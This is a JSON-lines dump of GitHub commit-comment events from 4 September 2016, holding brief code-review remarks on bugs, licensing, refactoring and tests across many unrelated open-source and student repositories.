{"id":"4513874037","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18893316,"position":null,"line":null,"path":null,"commit_id":"80d9e7591f9d2b9dab7ce1a1f952b0ce68585ad1","created_at":"2016-09-04T14:57:29Z","updated_at":"2016-09-04T14:57:29Z","body":"Looks strong! Then maybe you could retry with the nonlinear \"multiple weaknesses\" penalty for LooseEnemies + WeakPawns :-)"}},"created_at":"2016-09-04T14:57:29Z"}
{"id":"4513874219","type":"CommitCommentEvent","actor":{"login":"jozeff3"},"repo":{"name":"jozeff3/smart_devil"},"payload":{"comment":{"id":18893317,"position":4,"line":46,"path":"launch.sh","commit_id":"b751b00f26aaa6255a9b4b7fe36ddfb1541bfdfb","created_at":"2016-09-04T14:57:36Z","updated_at":"2016-09-04T14:57:36Z","body":"  ./tg/bin/telegram-cli -k ./tg/tg-server.pub -s ./bot/apibeyondbot.lua -l 1 -E $@\t"}},"created_at":"2016-09-04T14:57:36Z"}
{"id":"4513874674","type":"CommitCommentEvent","actor":{"login":"Jojo-Schmitz"},"repo":{"name":"musescore/MuseScore"},"payload":{"comment":{"id":18893318,"position":5,"line":50,"path":"mtest/testoves/bdat/harmony 2.ove-ref.mscx","commit_id":"9f57c06f51fd27e16a1213bfd5cbfff0d980ef0f","created_at":"2016-09-04T14:57:57Z","updated_at":"2016-09-04T14:57:57Z","body":"There are either too many, or there is one set more needed (I never know which way round to interprete the diff from the mtests), the latter would revert @lasconic's mtest fix from yesterday"}},"created_at":"2016-09-04T14:57:57Z"}
{"id":"4513874932","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18893319,"position":5,"line":62,"path":"src/game/AI/CreatureAISelector.cpp","commit_id":"8835ddf39694260c2234c0ca4b3c54e705aa44ff","created_at":"2016-09-04T14:58:09Z","updated_at":"2016-09-04T14:58:09Z","body":"Also I can answer this already now; this is caused when a mob which has no EventAI set is automatically given GuardianAI - because GuardianAI flows into CreatureEventAI then CreeatureEventAI finds no eventAI map (no skills) for the mob and reports this issue.\r\n\r\nOr did I get that wrong? I am no expert on CreatureEventAI, I have only looked into it's 'generic' AI elements (UpdateAI, etc..)"}},"created_at":"2016-09-04T14:58:09Z"}
{"id":"4513875219","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"thiloo/code"},"payload":{"comment":{"id":18893320,"position":6,"line":6,"path":"wk1/day5ex2.js","commit_id":"60710a984976abef121ff35b2d663dafc2545e8a","created_at":"2016-09-04T14:58:20Z","updated_at":"2016-09-04T14:58:20Z","body":"You could just do \r\n\r\n```js\r\nvar input;\r\n``` \r\n\r\nhere. Since it will be turned into an array in line 8 there is no reason to create an empty array here. Another alternative would be to delete this line and just start line 8 with `var`."}},"created_at":"2016-09-04T14:58:20Z"}
{"id":"4513875251","type":"CommitCommentEvent","actor":{"login":"Hacker432-Y550"},"repo":{"name":"Hacker432-Y550/android_device_huawei_y550"},"payload":{"comment":{"id":18893321,"position":null,"line":null,"path":null,"commit_id":"19846ebe91502a38c6b24c8659d1a770bb6bebb4","created_at":"2016-09-04T14:58:21Z","updated_at":"2016-09-04T14:58:21Z","body":"I haven't noticed it"}},"created_at":"2016-09-04T14:58:21Z"}
{"id":"4513875454","type":"CommitCommentEvent","actor":{"login":"jaredo"},"repo":{"name":"jaredo/jeigen"},"payload":{"comment":{"id":18893322,"position":null,"line":null,"path":null,"commit_id":"88df1ef86adc2f4323c0fd970f84ceb8d1f79d41","created_at":"2016-09-04T14:58:29Z","updated_at":"2016-09-04T14:58:29Z","body":"Hi Hugh,\r\n\r\nApologies for not getting back to you. Unfortunately it is not possible to get this licensed under MPL. I implemented this at Illumina and we release code under GPL as a matter of policy. Note RedSVD provides a very similar algorithm under BSD: https://github.com/ntessore/redsvd-h\r\n\r\nSorry, Jared."}},"created_at":"2016-09-04T14:58:29Z"}
{"id":"4513876496","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"thiloo/code"},"payload":{"comment":{"id":18893323,"position":17,"line":17,"path":"wk1/day5ex2.js","commit_id":"60710a984976abef121ff35b2d663dafc2545e8a","created_at":"2016-09-04T14:59:14Z","updated_at":"2016-09-04T14:59:14Z","body":"I don't see how this case will ever happen."}},"created_at":"2016-09-04T14:59:14Z"}
{"id":"4513878985","type":"CommitCommentEvent","actor":{"login":"Utumno"},"repo":{"name":"wrye-bash/wrye-bash"},"payload":{"comment":{"id":18893324,"position":17,"line":1544,"path":"Mopy/bash/game/oblivion/constants.py","commit_id":"70306e70469fec30d0649b88965871710d4e9c7e","created_at":"2016-09-04T15:00:46Z","updated_at":"2016-09-04T15:00:46Z","body":"I could fix it by just rewriting this as \"SOUN\": ('soundFile', 'minDistance', 'maxDistance', 'freqAdjustment', 'staticAtten', \\but I did it this way for making clear I use the SNDX subrecord"}},"created_at":"2016-09-04T15:00:46Z"}
{"id":"4513879057","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"thiloo/code"},"payload":{"comment":{"id":18893325,"position":20,"line":20,"path":"wk1/day5ex2.js","commit_id":"60710a984976abef121ff35b2d663dafc2545e8a","created_at":"2016-09-04T15:00:50Z","updated_at":"2016-09-04T15:00:50Z","body":"This will work provided that the input string did not have any commas in it. If it did then those would be removed. We could prevent this by doing `newArray.join('')` instead of using the array's `toString` method."}},"created_at":"2016-09-04T15:00:50Z"}
{"id":"4513879843","type":"CommitCommentEvent","actor":{"login":"aopod"},"repo":{"name":"AFNetworking/AFNetworking"},"payload":{"comment":{"id":18893326,"position":null,"line":null,"path":null,"commit_id":"2ffdc3db85966b99dd67afad106cc10ff4165f69","created_at":"2016-09-04T15:01:18Z","updated_at":"2016-09-04T15:01:18Z","body":"I think simply replace [NSDictionary dictionaryWithDictionary:self.mutableHTTPRequestHeaders] in - (NSDictionary *)HTTPRequestHeaders with [self.mutableHTTPRequestHeaders copy] will avoid the crash while removing and setting one field in hight concurrency. The reason is there are some difference between +dictionaryWithDictionary and -copy。In assembly code, +dictionaryWithDictionary will check nil of object, while -copy don't. The detail is in http://www.aopod.com/2016/09/04/dictionaryWithDictionary_and_copy/ (Sorry, but it's in Chinese), which includes some assembly code of x86_64(Simulator)."}},"created_at":"2016-09-04T15:01:18Z"}
{"id":"4513879927","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"KarenNemeth/Spiced-Academy"},"payload":{"comment":{"id":18893327,"position":7,"line":7,"path":"wk1/This-Constructor.js","commit_id":"876a00699377094ec667ef85f0943c5e3f138c61","created_at":"2016-09-04T15:01:21Z","updated_at":"2016-09-04T15:01:21Z","body":"No need for parens here"}},"created_at":"2016-09-04T15:01:21Z"}
{"id":"4513880031","type":"CommitCommentEvent","actor":{"login":"Utumno"},"repo":{"name":"wrye-bash/wrye-bash"},"payload":{"comment":{"id":18893328,"position":null,"line":null,"path":null,"commit_id":"70306e70469fec30d0649b88965871710d4e9c7e","created_at":"2016-09-04T15:01:26Z","updated_at":"2016-09-04T15:01:26Z","body":"See: http://forums.bethsoft.com/topic/1604190-wrye-bash-thread-110/page-6#entry25214456 for the report"}},"created_at":"2016-09-04T15:01:26Z"}
{"id":"4513881433","type":"CommitCommentEvent","actor":{"login":"lucaro"},"repo":{"name":"silvanheller/cineast"},"payload":{"comment":{"id":18893331,"position":18,"line":27,"path":"src/org/vitrivr/cineast/core/util/ArtUtil.java","commit_id":"96da5207d37b57639a481b37f5c5624dbb8b8eda","created_at":"2016-09-04T15:02:24Z","updated_at":"2016-09-04T15:02:24Z","body":"Try to avoid nested ternary operators and anonymous inline functions as they are difficult to read and not reusable which can lead to code duplication. I would suggest implementing a comparator class instead, especially for the ShotDescriptor (soon to be SegmentDescriptor) version."}},"created_at":"2016-09-04T15:02:24Z"}
{"id":"4513881481","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"KarenNemeth/Spiced-Academy"},"payload":{"comment":{"id":18893332,"position":35,"line":35,"path":"wk1/This-Constructor.js","commit_id":"876a00699377094ec667ef85f0943c5e3f138c61","created_at":"2016-09-04T15:02:26Z","updated_at":"2016-09-04T15:02:26Z","body":"I don't think we will ever get into this block"}},"created_at":"2016-09-04T15:02:26Z"}
{"id":"4513881948","type":"CommitCommentEvent","actor":{"login":"cambro"},"repo":{"name":"UW-Macrostrat/sift"},"payload":{"comment":{"id":18893333,"position":null,"line":null,"path":null,"commit_id":"64fb07eb4e74af81d45ba0431c6861058fa60c76","created_at":"2016-09-04T15:02:46Z","updated_at":"2016-09-04T15:02:46Z","body":"this actually was a bug in PBDB and needs rolled back"}},"created_at":"2016-09-04T15:02:46Z"}
{"id":"4513882078","type":"CommitCommentEvent","actor":{"login":"ljacqu"},"repo":{"name":"DardBrinza/AuthMeReloaded"},"payload":{"comment":{"id":18893335,"position":null,"line":null,"path":null,"commit_id":"38736c3efe0f0635dd78375de853c1561f592aaf","created_at":"2016-09-04T15:02:50Z","updated_at":"2016-09-04T15:02:50Z","body":"Hi @DardBrinza , can we add your translations to the main AuthMe repo? We'd love to have up-to-date Russian messages on the main repo :smile:"}},"created_at":"2016-09-04T15:02:50Z"}
{"id":"4513883212","type":"CommitCommentEvent","actor":{"login":"fuziom"},"repo":{"name":"rnplus/agar.io-private-server"},"payload":{"comment":{"id":18893336,"position":null,"line":null,"path":null,"commit_id":"9f26dda765b9e0f43fcfd70e0bbf68206834374a","created_at":"2016-09-04T15:03:43Z","updated_at":"2016-09-04T15:03:43Z","body":"mods"}},"created_at":"2016-09-04T15:03:43Z"}
{"id":"4513883627","type":"CommitCommentEvent","actor":{"login":"fuziom"},"repo":{"name":"rnplus/agar.io-private-server"},"payload":{"comment":{"id":18893337,"position":null,"line":null,"path":null,"commit_id":"9f26dda765b9e0f43fcfd70e0bbf68206834374a","created_at":"2016-09-04T15:04:02Z","updated_at":"2016-09-04T15:04:02Z","body":"i wil a private survur"}},"created_at":"2016-09-04T15:04:02Z"}
{"id":"4513884534","type":"CommitCommentEvent","actor":{"login":"elimisteve"},"repo":{"name":"xlab/go-lambda"},"payload":{"comment":{"id":18893338,"position":11,"line":10,"path":"lambda/lambda.go","commit_id":"787a2bbb44a14a3d359626cc222e542f5d88f742","created_at":"2016-09-04T15:04:37Z","updated_at":"2016-09-04T15:04:37Z","body":"@xlab Why not return `([]byte, error)`?"}},"created_at":"2016-09-04T15:04:37Z"}
{"id":"4513884726","type":"CommitCommentEvent","actor":{"login":"CarlosArriagaCM"},"repo":{"name":"Hacker432-Y550/android_device_huawei_y550"},"payload":{"comment":{"id":18893340,"position":null,"line":null,"path":null,"commit_id":"19846ebe91502a38c6b24c8659d1a770bb6bebb4","created_at":"2016-09-04T15:04:46Z","updated_at":"2016-09-04T15:04:46Z","body":"I invite my group Telegram :D"}},"created_at":"2016-09-04T15:04:46Z"}
{"id":"4513885198","type":"CommitCommentEvent","actor":{"login":"lasconic"},"repo":{"name":"musescore/MuseScore"},"payload":{"comment":{"id":18893341,"position":5,"line":50,"path":"mtest/testoves/bdat/harmony 2.ove-ref.mscx","commit_id":"9f57c06f51fd27e16a1213bfd5cbfff0d980ef0f","created_at":"2016-09-04T15:05:08Z","updated_at":"2016-09-04T15:05:08Z","body":"Ideally, it would be good that Travis and Werner's machine agree on the number of systems for this example :)"}},"created_at":"2016-09-04T15:05:08Z"}
{"id":"4513885463","type":"CommitCommentEvent","actor":{"login":"nicknitewolf"},"repo":{"name":"CyanogenMod/android_kernel_xiaomi_msm8956"},"payload":{"comment":{"id":18893342,"position":null,"line":null,"path":null,"commit_id":"13eea0c9d5d6e0e9ae78a78b19b5c5de4cd3783f","created_at":"2016-09-04T15:05:19Z","updated_at":"2016-09-04T15:05:19Z","body":"@morrey where did you get those lines from?"}},"created_at":"2016-09-04T15:05:19Z"}
{"id":"4513886612","type":"CommitCommentEvent","actor":{"login":"lasconic"},"repo":{"name":"musescore/MuseScore"},"payload":{"comment":{"id":18893345,"position":5,"line":50,"path":"mtest/testoves/bdat/harmony 2.ove-ref.mscx","commit_id":"9f57c06f51fd27e16a1213bfd5cbfff0d980ef0f","created_at":"2016-09-04T15:06:12Z","updated_at":"2016-09-04T15:06:12Z","body":"Could it be that chords.xml is not found in one of case or the other? and so the chord symbols are rendered differently, and so the number of system is different?"}},"created_at":"2016-09-04T15:06:12Z"}
{"id":"4513887360","type":"CommitCommentEvent","actor":{"login":"universam1"},"repo":{"name":"mikeller/openLRSng"},"payload":{"comment":{"id":18893347,"position":82,"line":603,"path":"TX.h","commit_id":"b3610b6bbac52b926673a0bb717717bfaf19941a","created_at":"2016-09-04T15:06:44Z","updated_at":"2016-09-04T15:06:44Z","body":"should be 26!"}},"created_at":"2016-09-04T15:06:44Z"}
{"id":"4513887910","type":"CommitCommentEvent","actor":{"login":"universam1"},"repo":{"name":"mikeller/openLRSng"},"payload":{"comment":{"id":18893349,"position":79,"line":600,"path":"TX.h","commit_id":"b3610b6bbac52b926673a0bb717717bfaf19941a","created_at":"2016-09-04T15:07:05Z","updated_at":"2016-09-04T15:07:05Z","body":"parsing one byte too less"}},"created_at":"2016-09-04T15:07:05Z"}
{"id":"4513892602","type":"CommitCommentEvent","actor":{"login":"mo0ojava"},"repo":{"name":"NoxxDev/NecroBot"},"payload":{"comment":{"id":18893351,"position":null,"line":null,"path":null,"commit_id":"28b4877d2d693aaa9a272666f70ba1fadae544a3","created_at":"2016-09-04T15:10:22Z","updated_at":"2016-09-04T15:10:22Z","body":"Good job. :+1: \r\nCouldn't find this bastard."}},"created_at":"2016-09-04T15:10:22Z"}
{"id":"4513893121","type":"CommitCommentEvent","actor":{"login":"KarenNemeth"},"repo":{"name":"KarenNemeth/Spiced-Academy"},"payload":{"comment":{"id":18893352,"position":35,"line":35,"path":"wk1/This-Constructor.js","commit_id":"876a00699377094ec667ef85f0943c5e3f138c61","created_at":"2016-09-04T15:10:41Z","updated_at":"2016-09-04T15:10:41Z","body":"If i is not a letter will it automatically return the character then? Not making any change to it?"}},"created_at":"2016-09-04T15:10:41Z"}
{"id":"4513893554","type":"CommitCommentEvent","actor":{"login":"webratte"},"repo":{"name":"kontalk/androidclient"},"payload":{"comment":{"id":18893354,"position":null,"line":null,"path":null,"commit_id":"f88cb41d99febfa5001bcb2930b27a30b54ce60d","created_at":"2016-09-04T15:11:00Z","updated_at":"2016-09-04T15:11:00Z","body":"Halifax's time will come again. I belive in Kontalk."}},"created_at":"2016-09-04T15:11:00Z"}
{"id":"4513896285","type":"CommitCommentEvent","actor":{"login":"ThomasKaiser"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":18893355,"position":null,"line":null,"path":null,"commit_id":"ac47cbaff974a7ad51a9b93875e5c7a28c400556","created_at":"2016-09-04T15:13:00Z","updated_at":"2016-09-04T15:13:00Z","body":"Hmm... is removing xenial from so many boards just due to reducing `build_all.sh` execution time?"}},"created_at":"2016-09-04T15:13:00Z"}
{"id":"4513899278","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cyberium/mangos-tbc"},"payload":{"comment":{"id":18893358,"position":305,"line":274,"path":"src/game/PetHandler.cpp","commit_id":"a1c1c23a950225631dcfd8a439affaf12e26815f","created_at":"2016-09-04T15:15:07Z","updated_at":"2016-09-04T15:15:07Z","body":"No more checking learning at all? this was only for non controlled pets?"}},"created_at":"2016-09-04T15:15:07Z"}
{"id":"4513900922","type":"CommitCommentEvent","actor":{"login":"remy-go"},"repo":{"name":"remy-go/lesson-4"},"payload":{"comment":{"id":18893361,"position":null,"line":null,"path":null,"commit_id":"ddcec5e648119f51eb998427d6c6ffaab381a4f8","created_at":"2016-09-04T15:16:15Z","updated_at":"2016-09-04T15:16:15Z","body":"removing  old event listeners from colorButton"}},"created_at":"2016-09-04T15:16:15Z"}
{"id":"4513901386","type":"CommitCommentEvent","actor":{"login":"hughperkins"},"repo":{"name":"jaredo/jeigen"},"payload":{"comment":{"id":18893363,"position":null,"line":null,"path":null,"commit_id":"88df1ef86adc2f4323c0fd970f84ceb8d1f79d41","created_at":"2016-09-04T15:16:35Z","updated_at":"2016-09-04T15:16:35Z","body":"Ok, understood.  Do you mind clarifying in your fork code that the code is licensed under GPLv3?"}},"created_at":"2016-09-04T15:16:35Z"}
{"id":"4513901767","type":"CommitCommentEvent","actor":{"login":"fidele007"},"repo":{"name":"fidele007/khmer-smarter-keyboard"},"payload":{"comment":{"id":18893364,"position":null,"line":null,"path":null,"commit_id":"6ef199554a7ff37e73dd3b761e8eb6c1f5b212a7","created_at":"2016-09-04T15:16:51Z","updated_at":"2016-09-04T15:16:51Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;JBcb0VkD&#x2F;20-bug-fix-crash-in-v2-1-2-of-the-app\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> [Bug] Fix crash in v2.1.2 of the app</a>"}},"created_at":"2016-09-04T15:16:51Z"}
{"id":"4513903389","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cyberium/mangos-tbc"},"payload":{"comment":{"id":18893366,"position":14,"line":1181,"path":"src/game/Spell.cpp","commit_id":"a1c1c23a950225631dcfd8a439affaf12e26815f","created_at":"2016-09-04T15:18:00Z","updated_at":"2016-09-04T15:18:00Z","body":"I have been thinking. this is unrelated to your work by the way. but do we really want to be adding threat manually? We're doing this all over in different places and I don't really get it, shouldn't the unit attack function take care of that, or..?"}},"created_at":"2016-09-04T15:18:00Z"}
{"id":"4513904064","type":"CommitCommentEvent","actor":{"login":"iwean"},"repo":{"name":"NoxxDev/NecroBot"},"payload":{"comment":{"id":18893368,"position":null,"line":null,"path":null,"commit_id":"28b4877d2d693aaa9a272666f70ba1fadae544a3","created_at":"2016-09-04T15:18:28Z","updated_at":"2016-09-04T15:18:28Z","body":"Two Thumbs :+1: :+1: "}},"created_at":"2016-09-04T15:18:28Z"}
{"id":"4513905257","type":"CommitCommentEvent","actor":{"login":"chenxu-javascript"},"repo":{"name":"chenxu-javascript/zbj"},"payload":{"comment":{"id":18893369,"position":null,"line":null,"path":null,"commit_id":"5b9b19907aeed7c4172fe5b89be77df14fae1179","created_at":"2016-09-04T15:19:19Z","updated_at":"2016-09-04T15:19:19Z","body":"删除 "}},"created_at":"2016-09-04T15:19:19Z"}
{"id":"4513905454","type":"CommitCommentEvent","actor":{"login":"Creeperface01"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18893371,"position":null,"line":null,"path":null,"commit_id":"5dddbe6cd06f2041dd0d815bfb78726544ffeea9","created_at":"2016-09-04T15:19:27Z","updated_at":"2016-09-04T15:19:27Z","body":"anvil is completely wrong..."}},"created_at":"2016-09-04T15:19:27Z"}
{"id":"4513905965","type":"CommitCommentEvent","actor":{"login":"xlab"},"repo":{"name":"xlab/go-lambda"},"payload":{"comment":{"id":18893373,"position":11,"line":10,"path":"lambda/lambda.go","commit_id":"787a2bbb44a14a3d359626cc222e542f5d88f742","created_at":"2016-09-04T15:19:48Z","updated_at":"2016-09-04T15:19:48Z","body":"@elimisteve because AWS Lambda supports only one return value, see http://docs.aws.amazon.com/lambda/latest/dg/python-programming-model-handler-types.html\r\n\r\nIt assumes that it is the response body, so if you need to implement error handling,\r\nreturn something like `[]byte(\"{'error':'foo bar'}\")`, for very simple cases I use a helper like `func retErr(err error) []byte`.\r\n\r\nAlso, FYI: invokation of this handler is in a python script that Lambda invokes: https://github.com/xlab/go-lambda/blob/master/misc.go#L99"}},"created_at":"2016-09-04T15:19:48Z"}
{"id":"4513909347","type":"CommitCommentEvent","actor":{"login":"stinaanita"},"repo":{"name":"stinaanita/Tester-Repository"},"payload":{"comment":{"id":18893377,"position":1,"line":1,"path":"README.md","commit_id":"e162f3e96be373d6e08338c7970fb1f230ec5e68","created_at":"2016-09-04T15:22:10Z","updated_at":"2016-09-04T15:22:10Z","body":"This is a commmit."}},"created_at":"2016-09-04T15:22:10Z"}
{"id":"4513911670","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cyberium/mangos-tbc"},"payload":{"comment":{"id":18893382,"position":null,"line":null,"path":null,"commit_id":"a1c1c23a950225631dcfd8a439affaf12e26815f","created_at":"2016-09-04T15:23:51Z","updated_at":"2016-09-04T15:23:51Z","body":"I was acually wondering last night where the pethandler stuff you did for wrath was at, there it was. Sorry for not noticing myself earlier, it directly altered a bit of my work, I don't understand how I could forget. Maybe I was in shock how much you changed the spell effects. I hope you been careful not to wipe all my positive changes to the spell effects when porting :3"}},"created_at":"2016-09-04T15:23:51Z"}
{"id":"4513911966","type":"CommitCommentEvent","actor":{"login":"sonnguyen135"},"repo":{"name":"sonnguyen135/MyOwnAPI"},"payload":{"comment":{"id":18893383,"position":5,"line":7,"path":"database/migrations/2016_09_04_082748_makers_table.php","commit_id":"aaa1cf441e1aea877a1849564acbf606256d3e9c","created_at":"2016-09-04T15:24:04Z","updated_at":"2016-09-04T15:24:04Z","body":"dfsdf"}},"created_at":"2016-09-04T15:24:04Z"}
{"id":"4513916086","type":"CommitCommentEvent","actor":{"login":"mingxuWang"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":18893387,"position":4,"line":4,"path":"huangyi/role/view.js","commit_id":"db962019134a8a0e608c8343611d15052afdd9fc","created_at":"2016-09-04T15:26:51Z","updated_at":"2016-09-04T15:26:51Z","body":"search组件是怎么用的？我看下面的js中也引用了这个但是也没有发现使用的地方。"}},"created_at":"2016-09-04T15:26:51Z"}
{"id":"4513916745","type":"CommitCommentEvent","actor":{"login":"lucasterra"},"repo":{"name":"Tibia-WindBot/lucas-library"},"payload":{"comment":{"id":18893389,"position":null,"line":null,"path":null,"commit_id":"60e7707b3c71daace9b7a45a069e4ce4e1b38caf","created_at":"2016-09-04T15:27:20Z","updated_at":"2016-09-04T15:27:20Z","body":"Let me know if there is anything else you wanna merge before I put this online"}},"created_at":"2016-09-04T15:27:20Z"}
{"id":"4513917145","type":"CommitCommentEvent","actor":{"login":"melmar12"},"repo":{"name":"melmar12/Udemy-Node-todo-api"},"payload":{"comment":{"id":18893391,"position":1,"line":1,"path":"db.js","commit_id":"dacba6f9558cb6eff40a7080c041fc6d5a83d3cf","created_at":"2016-09-04T15:27:39Z","updated_at":"2016-09-04T15:27:39Z","body":"the fatal error...  :grimacing:"}},"created_at":"2016-09-04T15:27:39Z"}
{"id":"4513917181","type":"CommitCommentEvent","actor":{"login":"mingxuWang"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":18893392,"position":50,"line":50,"path":"huangyi/stocktaking/view.js","commit_id":"db962019134a8a0e608c8343611d15052afdd9fc","created_at":"2016-09-04T15:27:40Z","updated_at":"2016-09-04T15:27:40Z","body":"这里的_是指不会用到的变量吗？"}},"created_at":"2016-09-04T15:27:40Z"}
{"id":"4513917250","type":"CommitCommentEvent","actor":{"login":"olmobrutall"},"repo":{"name":"signumsoftware/framework"},"payload":{"comment":{"id":18893393,"position":null,"line":null,"path":null,"commit_id":"4ac1535d605c45e8d6f4b16b33cce9af03716cb0","created_at":"2016-09-04T15:27:43Z","updated_at":"2016-09-04T15:27:43Z","body":"# ViewPromise\r\n\r\n```\r\nFIND:    new EntitySettings\\((\\w*),\\s*(\\w)\\s*=>\\s*new Promise\\(\r\nREPLACE: new EntitySettings($1, $2 => new ViewPromise(\r\n\r\nFIND:    import\\s*{\\s*EntitySettings\\s*}\r\nREPLACE: import { EntitySettings, ViewPromise }\r\n\r\n```"}},"created_at":"2016-09-04T15:27:43Z"}
{"id":"4513919903","type":"CommitCommentEvent","actor":{"login":"domenkozar"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18893395,"position":null,"line":null,"path":null,"commit_id":"5d46ddf3f1cbc766ff5bb85221f187712f800e40","created_at":"2016-09-04T15:29:39Z","updated_at":"2016-09-04T15:29:39Z","body":"This mass rebuilds GTK3, I'd prefer such changes go through PRs as they're not minor bug fixes. Thanks!"}},"created_at":"2016-09-04T15:29:39Z"}
{"id":"4513920573","type":"CommitCommentEvent","actor":{"login":"stinaanita"},"repo":{"name":"stinaanita/Tester-Repository"},"payload":{"comment":{"id":18893396,"position":1,"line":1,"path":"README.md","commit_id":"e162f3e96be373d6e08338c7970fb1f230ec5e68","created_at":"2016-09-04T15:30:08Z","updated_at":"2016-09-04T15:30:08Z","body":"BlaBlaBla"}},"created_at":"2016-09-04T15:30:08Z"}
{"id":"4513920845","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"KarenNemeth/Spiced-Academy"},"payload":{"comment":{"id":18893397,"position":35,"line":35,"path":"wk1/This-Constructor.js","commit_id":"876a00699377094ec667ef85f0943c5e3f138c61","created_at":"2016-09-04T15:30:16Z","updated_at":"2016-09-04T15:30:16Z","body":"I think that if `text[i]` is not a letter then the first condition will be met and `text[i]` will be set to `text[i].toLowerCase()` and actually be unchanged. That is, both `toUpperCase` and `toLowerCase` return the  string unchanged if the string does not contain any letters. "}},"created_at":"2016-09-04T15:30:16Z"}
{"id":"4513922157","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"KarenNemeth/Spiced-Academy"},"payload":{"comment":{"id":18893398,"position":35,"line":35,"path":"wk1/This-Constructor.js","commit_id":"876a00699377094ec667ef85f0943c5e3f138c61","created_at":"2016-09-04T15:31:07Z","updated_at":"2016-09-04T15:31:07Z","body":"so yes, it automatically returns the character"}},"created_at":"2016-09-04T15:31:07Z"}
{"id":"4513924593","type":"CommitCommentEvent","actor":{"login":"ritthikai"},"repo":{"name":"DunstleOS/openkore"},"payload":{"comment":{"id":18893401,"position":null,"line":null,"path":null,"commit_id":"b7b833705f92dea125a29f3dcbd6403369f3fe65","created_at":"2016-09-04T15:32:57Z","updated_at":"2016-09-04T15:32:57Z","body":"เจอปัญหา 0918 แล้ว disconnect ทันทีเลยครับ"}},"created_at":"2016-09-04T15:32:57Z"}
{"id":"4513926087","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18893402,"position":null,"line":null,"path":null,"commit_id":"ab5657497ec453a7566cc00d6b68bf75e5304144","created_at":"2016-09-04T15:34:04Z","updated_at":"2016-09-04T15:34:04Z","body":"Actually on a second thought I think the original crypt_all() code worked just fine with zero. But this is slightly faster 😉 "}},"created_at":"2016-09-04T15:34:04Z"}
{"id":"4513927409","type":"CommitCommentEvent","actor":{"login":"bradyz"},"repo":{"name":"hongj77/coding-practice"},"payload":{"comment":{"id":18893404,"position":null,"line":null,"path":null,"commit_id":"da8198dcd6f9c61c7b362c7cd69fcd971cce4432","created_at":"2016-09-04T15:35:02Z","updated_at":"2016-09-04T15:35:02Z","body":"🐙"}},"created_at":"2016-09-04T15:35:02Z"}
{"id":"4513928354","type":"CommitCommentEvent","actor":{"login":"fanzheng"},"repo":{"name":"iissnan/hexo-theme-next"},"payload":{"comment":{"id":18893406,"position":null,"line":null,"path":null,"commit_id":"08dacd70f5c8a7c9bd31ba0453a34c8fea0d2323","created_at":"2016-09-04T15:35:43Z","updated_at":"2016-09-04T15:35:43Z","body":"加上http之后，对https站支持有问题，建议把http: 删掉。"}},"created_at":"2016-09-04T15:35:43Z"}
{"id":"4513928810","type":"CommitCommentEvent","actor":{"login":"Writtic"},"repo":{"name":"ENOW-IJI/storm"},"payload":{"comment":{"id":18893408,"position":null,"line":null,"path":null,"commit_id":"9c4da939abf10aa6e7331ebcf18de9be5b8d64a4","created_at":"2016-09-04T15:36:03Z","updated_at":"2016-09-04T15:36:03Z","body":"이제 SchedulingBolt가 각각의 Apache Kafka 토픽들을 인지할 수 있습니다."}},"created_at":"2016-09-04T15:36:03Z"}
{"id":"4513929644","type":"CommitCommentEvent","actor":{"login":"mingxuWang"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":18893409,"position":115,"line":115,"path":"huangyi/stocktaking/view.js","commit_id":"db962019134a8a0e608c8343611d15052afdd9fc","created_at":"2016-09-04T15:36:37Z","updated_at":"2016-09-04T15:36:37Z","body":"像fail方法用函数封装起来一样，这句也可以封装到函数里面去，两个地方都使用到了。"}},"created_at":"2016-09-04T15:36:37Z"}
{"id":"4513931694","type":"CommitCommentEvent","actor":{"login":"ZIM555"},"repo":{"name":"ZIM555/android_device_samsung_fortuna3g"},"payload":{"comment":{"id":18893411,"position":null,"line":null,"path":null,"commit_id":"f109dc242d55c8417770cb21dee19d489ea763d6","created_at":"2016-09-04T15:38:14Z","updated_at":"2016-09-04T15:38:14Z","body":"skype:   codenamezim"}},"created_at":"2016-09-04T15:38:14Z"}
{"id":"4513932678","type":"CommitCommentEvent","actor":{"login":"SkyBeastMC"},"repo":{"name":"SkyBeastMC/Buffy"},"payload":{"comment":{"id":18893412,"position":5,"line":114,"path":"Brainfuck/src/fr/buffy/Brainfuck.java","commit_id":"1f1faf33c22cb8149073495ffd9ebc198f15dd52","created_at":"2016-09-04T15:38:55Z","updated_at":"2016-09-04T15:38:55Z","body":"Removed \"- 1\" - it messed up the code because the loops where reopened everytime"}},"created_at":"2016-09-04T15:38:55Z"}
{"id":"4513934347","type":"CommitCommentEvent","actor":{"login":"akhfa"},"repo":{"name":"akhfa/Dist_IDS"},"payload":{"comment":{"id":18893414,"position":null,"line":null,"path":null,"commit_id":"94b922053e6dbf7ef9a469eef46b7c0362820cd1","created_at":"2016-09-04T15:40:10Z","updated_at":"2016-09-04T15:40:10Z","body":"Close issue #1 "}},"created_at":"2016-09-04T15:40:10Z"}
